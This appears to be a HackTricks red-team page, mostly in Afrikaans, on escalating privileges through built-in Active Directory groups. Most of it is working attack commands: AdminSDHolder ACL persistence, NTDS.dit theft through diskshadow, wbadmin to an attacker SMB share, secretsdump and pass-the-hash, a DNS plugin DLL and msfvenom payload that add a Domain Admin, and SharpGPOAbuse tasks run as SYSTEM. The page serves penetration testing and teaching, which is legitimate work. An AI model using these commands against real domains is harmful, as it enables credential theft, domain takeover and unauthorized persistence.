Geprivilegieerde Groepe
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Blaai deur die volledige HackTricks Training-katalogus vir die assesseringsroetes (ARTA/GRTA/AzRTA) en Linux Hacking Expert (LHE).
Ondersteun HackTricks
- Kyk na die intekenplanne!
- Sluit aan by die 💬 Discord-groep, die telegram-groep, volg @hacktricks_live op X/Twitter, of kyk na die LinkedIn-bladsy en YouTube-kanaal.
- Deel hacking tricks deur PRs in te stuur na die HackTricks en HackTricks Cloud github repos.
Bekende groepe met administrasiebevoegdhede
- Administrators
- Domain Admins
- Enterprise Admins
Account Operators
Hierdie groep is gemagtig om rekeninge en groepe te skep wat nie administrators op die domein is nie. Daarbenewens maak dit plaaslike aanmelding op die Domain Controller (DC) moontlik.
Om die lede van hierdie groep te identifiseer, word die volgende opdrag uitgevoer:
Get-NetGroupMember -Identity "Account Operators" -Recurse
Adding new users is permitted, as well as local login to the DC.
AdminSDHolder groep
Die Access Control List (ACL) van die AdminSDHolder groep is van kritieke belang, aangesien dit vergunings instel vir alle “protected groups” binne Active Directory, insluitend hooggeprivilegieerde groepe. Hierdie meganisme verseker die sekuriteit van hierdie groepe deur ongemagtigde wysigings te voorkom.
’n Aanvaller kan dit uitbuit deur die Access Control List (ACL) van die AdminSDHolder groep te wysig en ’n standaard gebruiker volle regte te gee. Dit sou daardie gebruiker effektief volle beheer oor alle protected groups gee. As daardie gebruiker se regte verander of verwyder word, sal dit weens die stelselontwerp binne ’n uur outomaties weer herstel word.
Onlangse Windows Server-dokumentasie beskou steeds verskeie ingeboude operator-groepe as protected voorwerpe (Account Operators, Backup Operators, Print Operators, Server Operators, Domain Admins, Enterprise Admins, Key Admins, Enterprise Key Admins, ens.). Die SDProp proses hardloop op die PDC Emulator elke 60 minute standaard, stel adminCount=1, en skakel inheritance op protected objects af. Dit is nuttig vir persistence en vir die opsporing van verouderde geprivilegieerde gebruikers wat uit ’n protected group verwyder is maar steeds die nie-erfende ACL behou.
Opdragte om die lede te hersien en toestemmings te wysig sluit in:
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
# Hunt users/groups that still have adminCount=1
Get-ADObject -LDAPFilter '(adminCount=1)' -Properties adminCount,distinguishedName |
Select-Object distinguishedName
’n Skrip is beskikbaar om die herstelproses te versnel: Invoke-ADSDPropagation.ps1.
Vir meer besonderhede, besoek ired.team.
AD Recycle Bin
Lidmaatskap van hierdie groep maak dit moontlik om verwyderde Active Directory-objekte te lees, wat sensitiewe inligting kan blootstel:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Dit is nuttig vir recovering previous privilege paths. Verwyderde objekte kan steeds lastKnownParent, memberOf, sIDHistory, adminCount, ou SPNs, of die DN van ’n verwyderde privileged group blootstel wat later deur ’n ander operator herstel kan word.
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects `
-Properties samAccountName,lastKnownParent,memberOf,sIDHistory,adminCount,servicePrincipalName |
Select-Object samAccountName,lastKnownParent,adminCount,sIDHistory,servicePrincipalName
Toegang tot die Domain Controller
Toegang tot lêers op die DC is beperk tensy die gebruiker deel is van die Server Operators-groep, wat die vlak van toegang verander.
Privilege Escalation
Deur PsService of sc van Sysinternals te gebruik, kan jy dienspermissies inspekteer en wysig. Die Server Operators-groep het byvoorbeeld volle beheer oor sekere dienste, wat die uitvoering van arbitrêre kommando’s en privilege escalation toelaat:
C:\> .\PsService.exe security AppReadiness
Hierdie opdrag openbaar dat Server Operators volle toegang het, wat die manipulasie van dienste vir verhoogde regte moontlik maak.
Backup Operators
Lidmaatskap van die Backup Operators groep gee toegang tot die DC01 lêerstelsel weens die SeBackup en SeRestore bevoegdhede. Hierdie bevoegdhede maak dit moontlik om vouers te deursoek, inhoud te lys en lêers te kopieer, selfs sonder eksplisiete toestemmings, deur die FILE_FLAG_BACKUP_SEMANTICS vlag te gebruik. Dit vereis die gebruik van spesifieke skripte vir hierdie proses.
Om groepslede te lys, voer uit:
Get-NetGroupMember -Identity "Backup Operators" -Recurse
Plaaslike Aanval
Om hierdie bevoegdhede plaaslik te benut, word die volgende stappe toegepas:
- Importeer nodige biblioteke:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
- Skakel in en verifieer
SeBackupPrivilege:
Set-SeBackupPrivilege
Get-SeBackupPrivilege
- Verkry toegang tot en kopieer lêers uit beperkte gidse, byvoorbeeld:
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
AD Attack
Direkte toegang tot die Domain Controller se lêerstelsel maak die diefstal van die NTDS.dit-databasis moontlik, wat alle NTLM-hashes vir domeingebruikers en -rekenaars bevat.
Using diskshadow.exe
- Skep ’n shadow copy van die
C-drive:
diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
exit
- Kopieer
NTDS.ditvanaf die shadow copy:
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Alternatiewelik, gebruik robocopy vir lêerkopieë:
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
- Haal
SYSTEMenSAMuit om hashes te onttrek:
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
- Haal alle hashes uit
NTDS.dit:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
- Na-uittrekking: Pass-the-Hash na DA
# Use the recovered Administrator NT hash to authenticate without the cleartext password
netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
# Or execute via SMB using an exec method
netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
Gebruik van wbadmin.exe
- Stel ’n NTFS-lêerstelsel op vir ’n SMB-server op die attacker machine en cache SMB credentials op die target machine.
- Gebruik
wbadmin.exevir stelsel-rugsteun en die uittrekking vanNTDS.dit:
net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
For a practical demonstration, see DEMO VIDEO WITH IPPSEC.
DnsAdmins
Lede van die DnsAdmins-groep kan hul voorregte misbruik om ’n arbitrêre DLL met SYSTEM-voorregte op ’n DNS-server te laai, wat dikwels op Domain Controllers aangebied word. Hierdie vermoë bied aansienlike uitbuitingpotensiaal.
Om lede van die DnsAdmins-groep te lys, gebruik:
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
Voer ’n willekeurige DLL uit (CVE‑2021‑40469)
Note
Hierdie kwesbaarheid maak dit moontlik om ewekansige kode met SYSTEM privileges in die DNS-diens uit te voer (gewoonlik binne die DCs). Hierdie probleem is in 2021 reggestel.
Lede kan die DNS-bediener laat ’n ewekansige DLL laai (lokaal of vanaf ’n afgeleë gedeelde netwerkbron) deur opdragte soos die volgende te gebruik:
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
# If dnscmd is not installed run from aprivileged PowerShell session:
Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
// Modify DLL to add user
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
}
// Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
Om die DNS-diens te herbegin (wat mag addisionele toestemmings vereis) is nodig sodat die DLL gelaai kan word:
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
Vir meer besonderhede oor hierdie aanvalvektor, verwys na ired.team.
Mimilib.dll
Dit is ook moontlik om mimilib.dll te gebruik vir command execution, deur dit te wysig om spesifieke commands of reverse shells uit te voer. Check this post vir meer inligting.
WPAD Record vir MitM
DnsAdmins kan DNS records manipuleer om Man-in-the-Middle (MitM) attacks uit te voer deur ’n WPAD record te skep nadat die global query block list gedeaktiveer is. Tools soos Responder of Inveigh kan gebruik word vir spoofing en capturing network traffic.
Event Log Readers
Lede kan toegang hê tot event logs en moontlik sensitiewe inligting vind, soos plaintext wagwoorde of besonderhede oor command execution:
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
Exchange Windows Permissions
Hierdie groep kan DACLs op die domeinobjek wysig, wat moontlik DCSync-bevoegdhede toeken. Tegnieke vir privilege escalation wat hierdie groep uitbuit, word in die Exchange-AD-Privesc GitHub repo uiteengesit.
# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
As jy as lid van hierdie groep kan optree, is die klassieke misbruik om ’n aanvaller-beheerde principal die replikasieregte te gee wat nodig is vir DCSync:
Add-DomainObjectAcl -TargetIdentity "DC=testlab,DC=local" -PrincipalIdentity attacker -Rights DCSync
Get-ObjectAcl -DistinguishedName "DC=testlab,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match 'attacker'}
In die verlede het PrivExchange mailbox-toegang gekoppel, Exchange-verifikasie afgedwing, en LDAP relay gebruik om op dieselfde primitief uit te kom. Selfs waar daardie relay-pad gemitigiseer is, bly direkte lidmaatskap in Exchange Windows Permissions of beheer van ’n Exchange server ’n hoë-waarde roete na domain replication rights.
Hyper-V Administrators
Hyper-V Administrators het volle toegang tot Hyper-V, wat uitgebuit kan word om beheer oor virtualized Domain Controllers te verkry. Dit sluit die kloning van live DCs en die onttrekking van NTLM hashes uit die NTDS.dit file in.
Uitbuitingsvoorbeeld
Die praktiese misbruik is gewoonlik offline access to DC disks/checkpoints eerder as ou host-level LPE tricks. Met toegang tot die Hyper-V host kan ’n operateur ’n checkpoint maak of ’n virtualized Domain Controller exporteer, die VHDX mounteer en NTDS.dit, SYSTEM en ander geheime onttrek sonder om LSASS binne die guest aan te raak:
# Host-side enumeration
Get-VM
Get-VHD -VMId <vm-guid>
# After exporting or checkpointing the DC, mount the disk read-only
Mount-VHD -Path 'C:\HyperV\Virtual Hard Disks\DC01.vhdx' -ReadOnly
Vanaf daar, hergebruik die Backup Operators werkstroom om Windows\NTDS\ntds.dit en die registry hives aflyn te kopieer.
Group Policy Creators Owners
Hierdie groep laat lede toe om Group Policies in die domein te skep. Hulle kan egter nie Group Policies op gebruikers of groepe toepas of bestaande GPOs wysig nie.
Die belangrike nuans is dat die skepper eienaar van die nuwe GPO word en gewoonlik genoeg regte kry om dit daarna te wysig. Dit beteken hierdie groep is interessant wanneer jy óf:
- create a malicious GPO and convince an admin to link it to a target OU/domain
- edit a GPO you created that is already linked somewhere useful
- abuse another delegated right that lets you link GPOs, while this group gives you the edit side
Praktiese misbruik beteken gewoonlik om ’n Immediate Task, startup script, local admin membership, of user rights assignment verandering by te voeg deur SYSVOL-backed policy files.
# Example with SharpGPOAbuse: add an immediate task that executes as SYSTEM
SharpGPOAbuse.exe --AddImmediateTask --TaskName "HT-Task" --Author TESTLAB\\Administrator --Command "cmd.exe" --Arguments "/c whoami > C:\\Windows\\Temp\\gpo.txt" --GPOName "Security Update"
As jy die GPO handmatig deur SYSVOL wysig, onthou die verandering alleen is nie genoeg nie: versionNumber, GPT.ini, en soms gPCMachineExtensionNames moet ook opgedateer word, anders sal kliënte die beleidvernuwing ignoreer.
Organization Management
In omgewings waar Microsoft Exchange ontplooi is, het ’n spesiale groep bekend as Organization Management beduidende bevoegdhede. Hierdie groep het voorreg om access the mailboxes of all domain users en handhaaf full control over the ‘Microsoft Exchange Security Groups’ Organizational Unit (OU). Hierdie beheer sluit die Exchange Windows Permissions groep in, wat vir privilege escalation uitgebuit kan word.
Privilege-benutting en opdragte
Print Operators
Lede van die Print Operators groep beskik oor verskeie voorregte, insluitend die SeLoadDriverPrivilege, wat hulle toelaat om log on locally to a Domain Controller, dit af te skakel, en drukkers te bestuur. Om hierdie voorregte te benut, veral as SeLoadDriverPrivilege nie in ’n nie-verhoogde konteks sigbaar is nie, is dit nodig om User Account Control (UAC) te omseil.
Om die lede van hierdie groep te lys, word die volgende PowerShell-opdrag gebruik:
Get-NetGroupMember -Identity "Print Operators" -Recurse
Op Domain Controllers is hierdie groep gevaarlik omdat die verstek Domain Controller Policy SeLoadDriverPrivilege aan Print Operators toeken. Indien jy ’n verhoogde token kry vir ’n lid van hierdie groep, kan jy die privilege aktiveer en ’n ondertekende maar kwesbare driver laai om na kernel/SYSTEM te spring. Vir besonderhede oor tokenhantering, sien Access Tokens.
Remote Desktop Users
Lede van hierdie groep kry toegang tot rekenaars via Remote Desktop Protocol (RDP). Om hierdie lede te lys, is PowerShell-kommando’s beskikbaar:
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
Verder insigte oor exploiting RDP kan in toegewyde pentesting-bronne gevind word.
Gebruikers van Beheer op Afstand
Lede kan toegang tot rekenaars kry via Windows Remote Management (WinRM). Enumeration van hierdie lede word bereik deur:
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
Vir uitbuitingstegnieke wat verband hou met WinRM, moet spesifieke dokumentasie geraadpleeg word.
Server Operators
Hierdie groep het toestemming om verskeie konfigurasies op Domain Controllers uit te voer, insluitend backup- en restore-privileges, verandering van stelseltyd en afsluiting van die stelsel. Om die lede te enumereer, is die opdrag wat verskaf word:
Get-NetGroupMember -Identity "Server Operators" -Recurse
Op Domain Controllers, Server Operators erf gewoonlik genoeg regte om reconfigure or start/stop services en ontvang ook SeBackupPrivilege/SeRestorePrivilege deur die standaard DC-beleid. In die praktyk maak dit hulle ’n brug tussen service-control abuse en NTDS extraction:
sc.exe \\dc01 query
sc.exe \\dc01 qc <service>
.\PsService.exe security <service>
As ’n diens-ACL hierdie groep verander-/beginregte gee, wys die diens na ’n ewekansige opdrag, begin dit as LocalSystem, en herstel dan die oorspronklike binPath. As diensbeheer beperk is, val terug op die bogenoemde Backup Operators-tegnieke om NTDS.dit te kopieer.
Verwysings
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges
- https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b–privileged-accounts-and-groups-in-active-directory
- https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-c–
- https://adsecurity.org/?p=3658
- http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
- https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- https://rastamouse.me/2019/01/gpo-abuse-part-1/
- https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13
- https://github.com/tandasat/ExploitCapcom
- https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html
- HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin
- https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c–protected-accounts-and-groups-in-active-directory
- https://labs.withsecure.com/tools/sharpgpoabuse
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Blaai deur die volledige HackTricks Training-katalogus vir die assesseringsroetes (ARTA/GRTA/AzRTA) en Linux Hacking Expert (LHE).
Ondersteun HackTricks
- Kyk na die intekenplanne!
- Sluit aan by die 💬 Discord-groep, die telegram-groep, volg @hacktricks_live op X/Twitter, of kyk na die LinkedIn-bladsy en YouTube-kanaal.
- Deel hacking tricks deur PRs in te stuur na die HackTricks en HackTricks Cloud github repos.


